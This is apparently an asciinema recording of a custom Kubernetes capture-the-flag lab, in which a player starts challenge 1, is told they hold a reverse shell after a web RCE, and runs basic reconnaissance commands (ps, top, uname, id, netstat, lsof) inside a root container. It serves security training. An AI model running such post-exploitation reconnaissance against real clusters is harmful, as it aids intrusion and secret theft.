{"version": 2, "width": 213, "height": 52, "timestamp": 1631268386, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.034483, "o", "\u001b[0m\u001b[49m\u001b[39m\u001b[27m\u001b[24m\u001b[1m\u001b[7m%\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                                                                                    \r\u001b[0m\u001b[49m\u001b[39m\u001b[27m\u001b[24m\u001b[K\r\n\u001b[1A\u001b7\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[48;5;238m\u001b[38;5;255m \u001b[0m\u001b[38;5;255m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;255m \u001b[0m\u001b[38;5;255m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;246m\u001b[0m\u001b[38;5;246m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m  \u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39m~\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m/Documents/\u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39mkubernetes-rootkit\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m/\u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39mctf-custom\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m \u001b[0m\u001b[38;5;31m\u001b[48;5;238m\u001b[49m\u001b[38;5;238m\u001b[0m\u001b[38;5;238m\u001b[49m\u001b[39m \u001b[0m\u001b[49m\u001b[39m                                                                                                                       "]
[0.034901, "o", "                                      \u001b[0m\u001b[49m\u001b[38;5;238m\u001b[0m\u001b[38;5;238m\u001b[48;5;238m\u001b[38;5;70m \u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;70m✔\u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;70m \u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[49m\u001b[39m\u001b[0m\u001b[49m\u001b[39m\u001b[27m\u001b[24m\r\u001b[51C"]
[0.152328, "o", "\u001b[?25l"]
[0.152507, "o", "\u001b8\u001b[0m\u001b[38;5;31m\u001b[49m\u001b[39m\u001b[27m\u001b[24m\u001b[J"]
[0.15532, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[48;5;238m\u001b[38;5;255m \u001b[0m\u001b[38;5;255m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;255m \u001b[0m\u001b[38;5;255m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;246m\u001b[0m\u001b[38;5;246m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m  \u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39m~\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m/Documents/\u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39mkubernetes-rootkit\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m/\u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39mctf-custom\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m \u001b[0m\u001b[38;5;31m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;246m\u001b[0m\u001b[38;5;246m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;178m \u001b[0m\u001b[38;5;178m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;76m \u001b[38;5;76m master \u001b[38;5;178m!5 \u001b[38;5;39m?8\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;178m \u001b[0m\u001b[38;5;178m\u001b[48;5;238m\u001b[49m\u001b[38;5;238m\u001b[0m\u001b[38;5;238m\u001b[49m\u001b[39m \u001b[0m\u001b[49m\u001b[39m\u001b[K\u001b[138C\u001b[0m\u001b[49m\u001b[38;5;238m\u001b[0m\u001b[38;5;238m\u001b[48;5;238m\u001b[38;5;70m \u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;70m✔\u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;5"]
[0.155342, "o", ";238m\u001b[38;5;70m \u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[49m\u001b[39m\u001b[142D"]
[0.155403, "o", "\u001b[?1h\u001b="]
[0.15585, "o", "\u001b[?12l\u001b[?25h"]
[0.156034, "o", "\u001b[?2004h"]
[0.327597, "o", "\u001b[H\u001b[2J\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[48;5;238m\u001b[38;5;255m \u001b[0m\u001b[38;5;255m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;255m \u001b[0m\u001b[38;5;255m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;246m\u001b[0m\u001b[38;5;246m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m  \u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39m~\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m/Documents/\u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39mkubernetes-rootkit\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m/\u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39mctf-custom\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m \u001b[0m\u001b[38;5;31m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;246m\u001b[0m\u001b[38;5;246m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;178m \u001b[0m\u001b[38;5;178m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;76m \u001b[38;5;76m master \u001b[38;5;178m!5 \u001b[38;5;39m?8\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;178m \u001b[0m\u001b[38;5;178m\u001b[48;5;238m\u001b[49m\u001b[38;5;238m\u001b[0m\u001b[38;5;238m\u001b[49m\u001b[39m \u001b[0m\u001b[49m\u001b[39m\u001b[K\u001b[138C\u001b[0m\u001b[49m\u001b[38;5;238m\u001b[0m\u001b[38;5;238m\u001b[48;5;238m\u001b[38;5;70m \u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;70m✔\u001b[0m\u001b[38;5;70m\u001b[48;5;238m"]
[0.327737, "o", "\u001b[48;5;238m\u001b[38;5;70m \u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[49m\u001b[39m\u001b[142D"]
[0.328743, "o", "\u001b[?25l"]
[0.341838, "o", "\r\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[0m\u001b[49m\u001b[39m\u001b[0m\u001b[48;5;238m\u001b[38;5;255m \u001b[0m\u001b[38;5;255m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;255m \u001b[0m\u001b[38;5;255m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;246m\u001b[0m\u001b[38;5;246m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m  \u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39m~\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m/Documents/\u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39mkubernetes-rootkit\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m/\u001b[1m\u001b[38;5;31m\u001b[48;5;238m\u001b[38;5;39mctf-custom\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m\u001b[0m\u001b[38;5;31m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;31m \u001b[0m\u001b[38;5;31m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;246m\u001b[0m\u001b[38;5;246m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;178m \u001b[0m\u001b[38;5;178m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;76m \u001b[38;5;76m master \u001b[38;5;178m!5 \u001b[38;5;39m?8\u001b[0m\u001b[38;5;39m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;178m \u001b[0m\u001b[38;5;178m\u001b[48;5;238m\u001b[49m\u001b[38;5;238m\u001b[0m\u001b[38;5;238m\u001b[49m\u001b[39m \u001b[0m\u001b[49m\u001b[39m\u001b[K\u001b[138C\u001b[0m\u001b[49m\u001b[38;5;238m\u001b[0m\u001b[38;5;238m\u001b[48;5;238m\u001b[38;5;70m \u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;5;238m\u001b[38;5;70m✔\u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[48;"]
[0.341938, "o", "5;238m\u001b[38;5;70m \u001b[0m\u001b[38;5;70m\u001b[48;5;238m\u001b[49m\u001b[39m\u001b[142D"]
[0.342277, "o", "\u001b[?12l\u001b[?25h"]
[0.838225, "o", "."]
[0.846431, "o", "\b.\u001b[90m/start.sh 1\u001b[39m\u001b[11D"]
[1.047248, "o", "\b.\u001b[39m/"]
[1.178701, "o", "\u001b[39ms"]
[1.248612, "o", "\u001b[39mt"]
[1.419869, "o", "\u001b[39ma\u001b[39mr\u001b[39mt\u001b[39m.\u001b[39ms\u001b[39mh\u001b[39m\u001b[1m \u001b[0m"]
[2.143688, "o", "\b\u001b[0m \u001b[39m1"]
[2.422974, "o", "\u001b[?1l\u001b>"]
[2.424619, "o", "\u001b[?2004l\r\r\n"]
[2.560172, "o", "Waiting for the pod to be ready, please wait...\r\n(It might take some time to download the container images)\r\n"]
[2.639768, "o", "Starting challenge 1, you should see a prompt! Good luck!\r\n\r\n"]
[2.797823, "o", "Welcome in challenge 1!\r\n---\r\nYou exploited a remote code execution vulnerability in a web a application and\r\nyou now have a reverse shell on the machine! Congratulation! It seems that the\r\nweb application was running in a container on Kubernetes... Maybe the cluster\r\nis hosting other applications that may store secrets?? ƪ(ړײ)ƪ\r\n"]
[2.798612, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[6.875406, "o", "\u001b[H\u001b[2J\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[8.60417, "o", "p"]
[8.652029, "o", "s"]
[8.759011, "o", " "]
[8.886596, "o", "-"]
[8.988289, "o", "e"]
[9.036541, "o", "f"]
[9.41372, "o", "\r\n"]
[9.42452, "o", "UID          PID    PPID  C STIME TTY          TIME CMD\r\nroot           1       0  0 10:04 ?        00:00:00 /bin/bash -c echo \"cat /root/.scripts/script.txt\" >> /root/.profile; sleep infinity\r\nroot          11       1  0 10:04 ?        00:00:00 sleep infinity\r\n"]
[9.424959, "o", "root         297       0  0 10:06 pts/0    00:00:00 /bin/bash -l\r\n"]
[9.428793, "o", "root         316     297  0 10:06 pts/0    00:00:00 ps -ef\r\n\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[11.485211, "o", "t"]
[11.576777, "o", "o"]
[11.608801, "o", "p"]
[13.900074, "o", "\r\n"]
[13.920635, "o", "\u001b[?1h\u001b=\u001b[?25l"]
[14.072763, "o", "\u001b[H\u001b[2J\u001b(B\u001b[mtop - 10:06:40 up 3 min,  0 users,  load average: 0.85, 0.89, 0.41\u001b(B\u001b[m\u001b[39;49m\u001b(B\u001b[m\u001b[39;49m\u001b[K\r\nTasks:\u001b(B\u001b[m\u001b[39;49m\u001b[1m   4 \u001b(B\u001b[m\u001b[39;49mtotal,\u001b(B\u001b[m\u001b[39;49m\u001b[1m   1 \u001b(B\u001b[m\u001b[39;49mrunning,\u001b(B\u001b[m\u001b[39;49m\u001b[1m   3 \u001b(B\u001b[m\u001b[39;49msleeping,\u001b(B\u001b[m\u001b[39;49m\u001b[1m   0 \u001b(B\u001b[m\u001b[39;49mstopped,\u001b(B\u001b[m\u001b[39;49m\u001b[1m   0 \u001b(B\u001b[m\u001b[39;49mzombie\u001b(B\u001b[m\u001b[39;49m\u001b(B\u001b[m\u001b[39;49m\u001b[K\r\n%Cpu(s):\u001b(B\u001b[m\u001b[39;49m\u001b[1m 10.3 \u001b(B\u001b[m\u001b[39;49mus,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  3.4 \u001b(B\u001b[m\u001b[39;49msy,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  0.0 \u001b(B\u001b[m\u001b[39;49mni,\u001b(B\u001b[m\u001b[39;49m\u001b[1m 86.2 \u001b(B\u001b[m\u001b[39;49mid,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  0.0 \u001b(B\u001b[m\u001b[39;49mwa,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  0.0 \u001b(B\u001b[m\u001b[39;49mhi,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  0.0 \u001b(B\u001b[m\u001b[39;49msi,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  0.0 \u001b(B\u001b[m\u001b[39;49mst\u001b(B\u001b[m\u001b[39;49m\u001b(B\u001b[m\u001b[39;49m\u001b[K\r\nMiB Mem :\u001b(B\u001b[m\u001b[39;49m\u001b[1m   1985.6 \u001b(B\u001b[m\u001b[39;49mtotal,\u001b(B\u001b[m\u001b[39;49m\u001b[1m    122.9 \u001b(B\u001b[m\u001b[39;49mfree,\u001b(B\u001b[m\u001b[39;49m\u001b[1m    667.4 \u001b(B\u001b[m\u001b[39;49mused,\u001b(B\u001b[m\u001b[39;49m\u001b[1m   1195.3 \u001b(B\u001b[m\u001b[39;49mbuff/cache\u001b(B\u001b[m\u001b[39;49m\u001b(B\u001b[m\u001b[39;49m\u001b[K\r\nMiB Swap:\u001b(B\u001b[m\u001b[39;49m\u001b[1m      0.0 \u001b(B\u001b[m\u001b[39"]
[14.073139, "o", ";49mtotal,\u001b(B\u001b[m\u001b[39;49m\u001b[1m      0.0 \u001b(B\u001b[m\u001b[39;49mfree,\u001b(B\u001b[m\u001b[39;49m\u001b[1m      0.0 \u001b(B\u001b[m\u001b[39;49mused.\u001b(B\u001b[m\u001b[39;49m\u001b[1m    524.9 \u001b(B\u001b[m\u001b[39;49mavail Mem \u001b(B\u001b[m\u001b[39;49m\u001b(B\u001b[m\u001b[39;49m\u001b[K\r\n\u001b[K\r\n\u001b[7m    PID USER      PR  NI    VIRT    RES    SHR S  %CPU  %MEM     TIME+ COMMAND                                                                                                                                       \u001b(B\u001b[m\u001b[39;49m\u001b[K\r\n\u001b(B\u001b[m      1 root      20   0    3980   2740   2520 S   0.0   0.1   0:00.01 bash                                                                                                                                          \u001b(B\u001b[m\u001b[39;49m\u001b[K\r\n\u001b(B\u001b[m     11 root      20   0    2512    584    520 S   0.0   0.0   0:00.00 sleep                                                                                                                                         \u001b(B\u001b[m\u001b[39;49m\u001b[K\r\n\u001b(B\u001b[m    297 root      20   0    4244   3552   2972 S   0.0   0.2   0:00.00 bash                                     "]
[14.073449, "o", "                                                                                                     \u001b(B\u001b[m\u001b[39;49m\u001b[K\r\n\u001b(B\u001b[m\u001b[1m    317 root      20   0    6124   3276   2744 R   0.0   0.2   0:00.00 top                                                                                                                                           \u001b(B\u001b[m\u001b[39;49m\u001b[K\r\n\u001b[J"]
[17.0783, "o", "\u001b[H\u001b(B\u001b[mtop - 10:06:43 up 3 min,  0 users,  load average: 0.94, 0.91, 0.41\u001b(B\u001b[m\u001b[39;49m\u001b(B\u001b[m\u001b[39;49m\u001b[K\r\n\r\n%Cpu(s):\u001b(B\u001b[m\u001b[39;49m\u001b[1m  6.8 \u001b(B\u001b[m\u001b[39;49mus,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  4.0 \u001b(B\u001b[m\u001b[39;49msy,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  0.0 \u001b(B\u001b[m\u001b[39;49mni,\u001b(B\u001b[m\u001b[39;49m\u001b[1m 88.7 \u001b(B\u001b[m\u001b[39;49mid,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  0.0 \u001b(B\u001b[m\u001b[39;49mwa,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  0.0 \u001b(B\u001b[m\u001b[39;49mhi,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  0.5 \u001b(B\u001b[m\u001b[39;49msi,\u001b(B\u001b[m\u001b[39;49m\u001b[1m  0.0 \u001b(B\u001b[m\u001b[39;49mst\u001b(B\u001b[m\u001b[39;49m\u001b(B\u001b[m\u001b[39;49m\u001b[K\r\nMiB Mem :\u001b(B\u001b[m\u001b[39;49m\u001b[1m   1985.6 \u001b(B\u001b[m\u001b[39;49mtotal,\u001b(B\u001b[m\u001b[39;49m\u001b[1m    121.7 \u001b(B\u001b[m\u001b[39;49mfree,\u001b(B\u001b[m\u001b[39;49m\u001b[1m    668.0 \u001b(B\u001b[m\u001b[39;49mused,\u001b(B\u001b[m\u001b[39;49m\u001b[1m   1195.9 \u001b(B\u001b[m\u001b[39;49mbuff/cache\u001b(B\u001b[m\u001b[39;49m\u001b(B\u001b[m\u001b[39;49m\u001b[K\r\nMiB Swap:\u001b(B\u001b[m\u001b[39;49m\u001b[1m      0.0 \u001b(B\u001b[m\u001b[39;49mtotal,\u001b(B\u001b[m\u001b[39;49m\u001b[1m      0.0 \u001b(B\u001b[m\u001b[39;49mfree,\u001b(B\u001b[m\u001b[39;49m\u001b[1m      0.0 \u001b(B\u001b[m\u001b[39;49mused.\u001b(B\u001b[m\u001b[39;49m\u001b[1m    524.3 \u001b(B\u001b[m\u001b[39;49mavail Mem \u001b(B\u001b[m\u001b[39;49m\u001b(B\u001b[m\u001b[39;49m\u001b[K\r\n\u001b[K\r\n\r\n\r\n\r\n\r\n\r\n\u001b[J"]
[19.422748, "o", "\u001b[?1l\u001b>\u001b[53;1H\r\n\u001b[?12l\u001b[?25h\u001b[K\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[20.398423, "o", "\u001b[H\u001b[2J\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[21.267415, "o", "u"]
[21.393731, "o", "n"]
[21.521391, "o", "a"]
[21.616043, "o", "m"]
[21.715908, "o", "e"]
[21.813226, "o", " "]
[21.953213, "o", "-"]
[22.034083, "o", "a"]
[22.150337, "o", "\r\n"]
[22.15557, "o", "Linux app-with-rce 4.19.202 #1 SMP Thu Sep 2 18:19:24 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux\r\n"]
[22.155917, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[24.101878, "o", "i"]
[24.157279, "o", "d"]
[24.304252, "o", "\r\n"]
[24.310664, "o", "uid=0(root) gid=0(root) groups=0(root)\r\n"]
[24.313044, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[26.278323, "o", "n"]
[26.339477, "o", "e"]
[26.446836, "o", "t"]
[26.601344, "o", "s"]
[26.752492, "o", "t"]
[26.872567, "o", "a"]
[27.211892, "o", "\b \b"]
[27.686149, "o", "a"]
[27.775871, "o", "t"]
[27.870865, "o", " "]
[28.062456, "o", "-"]
[28.27088, "o", "t"]
[28.924613, "o", "u"]
[29.091263, "o", "l"]
[29.233474, "o", "n"]
[29.366576, "o", "p"]
[29.530254, "o", "\r\n"]
[29.532653, "o", "Active Internet connections (only servers)\r\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    \r\n"]
[29.533151, "o", "\u001b]0;root@app-with-rce: /\u0007root@app-with-rce:/# "]
[31.727075, "o", "l"]
[31.828301, "o", "s"]
[31.93618, "o", "o"]
[32.00915, "o", "f"]
[32.137316, "o", " "]
[32.451868, "o", "|"]
[32.563324, "o", " "]
[32.69189, "o", "l"]
[32.745753, "o", "e"]
[32.922285, "o", "s"]
[33.046235, "o", "s"]
[33.206522, "o", "\r\n"]
[33.209389, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\r"]
[34.230647, "o", "COMMAND PID USER   FD   TYPE DEVICE SIZE/OFF    NODE NAME\r\nbash      1 root  cwd    DIR  0,231     4096 1069997 /\r\nbash      1 root  rtd    DIR  0,231     4096 1069997 /\r\nbash      1 root  txt    REG  0,231  1183448 1060739 /usr/bin/bash\r\nbash      1 root  mem    REG    8,1          1060739 /usr/bin/bash (path dev=0,231)\r\nbash      1 root  mem    REG    8,1          1061522 /usr/lib/x86_64-linux-gnu/libnss_files-2.31.so (path dev=0,231)\r\nbash      1 root  mem    REG    8,1          1061457 /usr/lib/x86_64-linux-gnu/libc-2.31.so (path dev=0,231)\r\nbash      1 root  mem    REG    8,1          1061468 /usr/lib/x86_64-linux-gnu/libdl-2.31.so (path dev=0,231)\r\nbash      1 root  mem    REG    8,1          1061578 /usr/lib/x86_64-linux-gnu/libtinfo.so.6.2 (path dev=0,231)\r\nbash      1 root  mem    REG    8,1          1061435 /usr/lib/x86_64-linux-gnu/ld-2.31.so (path dev=0,231)\r\nbash      1 root    0u   CHR    1,3      0t0   48245 /dev/null\r\nbash      1 root    1w  FIFO   0,10      0t0   48138 pipe\r\nbash      1 root "]
[34.230826, "o", "   2w  FIFO"]
[34.231149, "o", "   0,10      0t0   48139 pipe\r\nsleep    11 root  cwd    DIR  0,231     4096 1069997 /\r\nsleep    11 root  rtd    DIR  0,231     4096 1069997 /\r\nsleep    11 root  txt    REG  0,231    39256 1060954 /usr/bin/sleep\r\nsleep    11 root  mem    REG    8,1          1060954 /usr/bin/sleep (path dev=0,231)\r\nsleep    11 root  mem    REG    8,1          1061457 /usr/lib/x86_64-linux-gnu/libc-2.31.so (path dev=0,231)\r\nsleep    11 root  mem    REG    8,1          1061435 /usr/lib/x86_64-linux-gnu/ld-2.31.so (path dev=0,231)\r\nsleep    11 root    0u   CHR    1,3      0t0   48245 /dev/null\r\nsleep    11 root    1w  FIFO   0,10      0t0   48138 pipe\r\nsleep    11 root    2w  FIFO   0,10      0t0   48139 pipe\r\nbash    297 root  cwd    DIR  0,231     4096 1069997 /\r\nbash    297 root  rtd    DIR  0,231     4096 1069997 /\r\nbash    297 root  txt    REG  0,231  1183448 1060739 /usr/bin/bash\r\nbash    297 root  mem    REG    8,1          1060739 /usr/bin/bash (path dev=0,231)\r\nbash    297 root  mem    REG    8,1          1061522 /usr/lib"]
[34.231215, "o", "/x86_64-linux"]
[34.231635, "o", "-gnu/libnss_files-2.31.so (path dev=0,231)\r\nbash    297 root  mem    REG    8,1          1061457 /usr/lib/x86_64-linux-gnu/libc-2.31.so (path dev=0,231)\r\nbash    297 root  mem    REG    8,1          1061468 /usr/lib/x86_64-linux-gnu/libdl-2.31.so (path dev=0,231)\r\nbash    297 root  mem    REG    8,1          1061578 /usr/lib/x86_64-linux-gnu/libtinfo.so.6.2 (path dev=0,231)\r\nbash    297 root  mem    REG    8,1          1061435 /usr/lib/x86_64-linux-gnu/ld-2.31.so (path dev=0,231)\r\nbash    297 root    0u   CHR  136,0      0t0       3 /dev/pts/0\r\nbash    297 root    1u   CHR  136,0      0t0       3 /dev/pts/0\r\nbash    297 root    2u   CHR  136,0      0t0       3 /dev/pts/0\r\nbash    297 root  255u   CHR  136,0      0t0       3 /dev/pts/0\r\nlsof    321 root  cwd    DIR  0,231     4096 1069997 /\r\nlsof    321 root  rtd    DIR  0,231     4096 1069997 /\r\nlsof    321 root  txt    REG  0,231   175744 1070210 /usr/bin/lsof\r\nlsof    321 root  mem    REG    8,1          1070210 /usr/bin/lsof (path dev=0,231)\r\nlsof    321 r"]
[34.231694, "o", "oot  mem    "]
[34.231787, "o", "REG    8,1          1061551 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so (path dev=0,231)\r\nlsof    321 root  mem    REG    8,1          1061468 /usr/lib/x86_64-linux-gnu/libdl-2.31.so (path dev=0,231)\r\nlsof    321 root  mem    REG    8,1          1061546 /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.9.0 (path dev=0,231)\r\nlsof    321 root  mem    REG    8,1          1061457 /usr/lib/x86_64-linux-gnu/libc-2.31.so (path dev=0,231)\r\nlsof    321 root  mem    REG    8,1          1061559 /usr/lib/x86_64-linux-gnu/libselinux.so.1 (path dev=0,231)\r\nlsof    321 root  mem    REG    8,1          1061435 /usr/lib/x86_64-linux-gnu/ld-2.31.so (path dev=0,231)\r\nlsof    321 root    0u   CHR  136,0      0t0       3 /dev/pts/0\r\nlsof    321 root    1w  FIFO   0,10      0t0   54403 pipe\r\nlsof    321 root    2u   CHR  136,0      0t0       3 /dev/pts/0\r\nlsof    321 root    3r   DIR  0,232        0       1 /proc\r\nlsof    321 root    4r   DIR  0,232        0   53832 /proc/321/fd\r\nlsof    321 root    5w  FIFO   0,10      0t0   53836 pipe\r"]
[34.231861, "o", "\n:\u001b[K"]
[35.803541, "o", "\r\u001b[Klsof    321 root    6r  FIFO   0,10      0t0   53837 pipe\r\n:\u001b[K"]
[36.304702, "o", "\r\u001b[K"]
[36.306071, "o", "less    322 root  cwd    DIR  0,231     4096 1069997 /\r\n:\u001b[K"]
[36.333464, "o", "\r\u001b[Kless    322 root  rtd    DIR  0,231     4096 1069997 /"]
[36.333609, "o", "\r\n:\u001b[K"]
[36.360392, "o", "\r\u001b[Kless    322 root  txt    REG  0,231   180064 1070189 /usr/bin/less\r\n:\u001b[K"]
[36.392579, "o", "\r\u001b[Kless    322 root  mem    REG    8,1          1070189 /usr/bin/less (path dev=0,231)\r\n:\u001b[K"]
[36.420979, "o", "\r\u001b[Kless    322 root  mem    REG    8,1          1061457 /usr/lib/x86_64-linux-gnu/libc-2.31.so (path dev=0,231)\r\n:\u001b[K"]
[36.455453, "o", "\r\u001b[Kless    322 root  mem    REG    8,1          1061578 /usr/lib/x86_64-linux-gnu/libtinfo.so.6.2 (path dev=0,231)\r\n:\u001b[K"]
[36.482786, "o", "\r\u001b[Kless    322 root  mem    REG    8,1          1061435 /usr/lib/x86_64-linux-gnu/ld-2.31.so (path dev=0,231)\r\n:\u001b[K"]
[36.512142, "o", "\r\u001b[Kless    322 root    0r  FIFO   0,10      0t0   54403 pipe\r\n:\u001b[K"]
[36.542839, "o", "\r\u001b[Kless    322 root    1u   CHR  136,0      0t0       3 /dev/pts/0\r\n:\u001b[K"]
[36.574015, "o", "\r\u001b[Kless    322 root    2u   CHR  136,0      0t0       3 /dev/pts/0\r\n:\u001b[K"]
[36.608155, "o", "\r\u001b[Kless    322 root    3r   CHR    5,0      0t0   48260 /dev/tty\r\n:\u001b[K"]
[36.636669, "o", "\r\u001b[Klsof    323 root  cwd    DIR  0,231     4096 1069997 /\r\n:\u001b[K"]
[36.665071, "o", "\r\u001b[Klsof    323 root  rtd    DIR  0,231     4096 1069997 /\r\n:\u001b[K"]
[36.693049, "o", "\r\u001b[Klsof    323 root  txt    REG  0,231   175744 1070210 /usr/bin/lsof\r\n:\u001b[K"]
[36.723006, "o", "\r\u001b[Klsof    323 root  mem    REG    8,1          1070210 /usr/bin/lsof (path dev=0,231)\r\n:\u001b[K"]
[36.75317, "o", "\r\u001b[Klsof    323 root  mem    REG    8,1          1061551 /usr/lib/x86_64-linux-gnu/libpthread-2.31.so (path dev=0,231)\r\n:\u001b[K"]
[36.783581, "o", "\r\u001b[Klsof    323 root  mem    REG    8,1          1061468 /usr/lib/x86_64-linux-gnu/libdl-2.31.so (path dev=0,231)\r\n:\u001b[K"]
[36.813717, "o", "\r\u001b[Klsof    323 root  mem    REG    8,1          1061546 /usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.9.0 (path dev=0,231)\r\n:\u001b[K"]
[36.844809, "o", "\r\u001b[Klsof    323 root  mem    REG    8,1          1061457 /usr/lib/x86_64-linux-gnu/libc-2.31.so (path dev=0,231)\r\n:\u001b[K"]
[36.875878, "o", "\r\u001b[Klsof    323 root  mem    REG    8,1          1061559 /usr/lib/x86_64-linux-gnu/libselinux.so.1 (path dev=0,231)\r\n:\u001b[K"]
[36.906902, "o", "\r\u001b[Klsof    323 root  mem    REG    8,1          1061435 /usr/lib/x86_64-linux-gnu/ld-2.31.so (path dev=0,231)\r\n:\u001b[K"]
[36.935501, "o", "\r\u001b[Klsof    323 root    4r  FIFO   0,10      0t0   53836 pipe\r\n:\u001b[K"]
[36.966075, "o", "\r\u001b[Klsof    323 root    7w  FIFO   0,10      0t0   53837 pipe\r\n:\u001b[K"]
[36.996768, "o", "\r\u001b[K"]
[36.997294, "o", "\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.026214, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.057118, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.086973, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.117389, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
[37.147609, "o", "\r\u001b[K\u0007\r\u001b[K\u001b[7m(END)\u001b[27m\u001b[K"]
